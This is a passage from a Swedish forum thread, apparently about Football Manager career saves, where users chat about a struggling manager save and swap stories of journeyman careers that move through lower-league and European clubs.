En skrämmande nyhet för Hector är att 4 tränare i lag ovanför honom eller runt honom har fått sparken senaste veckan.


   
SvaraCitera
NemanjaVidic15
(@nemanjavidic15)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
Topic starter  

Bara en match i Mars och det var i cupen, Självklart vinner vi den!


   
SvaraCitera
trashbag
(@trashbag)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 193
 

Alltid kul att börja nere i botten. Kör själv en journeyman med Nordisk touch nu där jag började i Västerås IK i Division 3 och det går väldigt bra vill jag säga. Kämpa på och hoppas att managern en dag får lyfta CL-bucklan!


   
SvaraCitera
NemanjaVidic15
(@nemanjavidic15)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
Topic starter  
Postad av: @trashbag

Alltid kul att börja nere i botten. Kör själv en journeyman med Nordisk touch nu där jag började i Västerås IK i Division 3 och det går väldigt bra vill jag säga. Kämpa på och hoppas att managern en dag får lyfta CL-bucklan!

Älskar personligen Journeyman resor, Har en på FM20 där jag gick via Tvååker - Friska Viljor FC - AFC Eskilstuna - IFK Malmö - Montpellier - Manchester City - IFK Malmö - SC Paderborn - AC Milan Är nog i särklass min favoritsave dem åren jag spelat FM!


   
SvaraCitera
Sida 1 / 3
Share: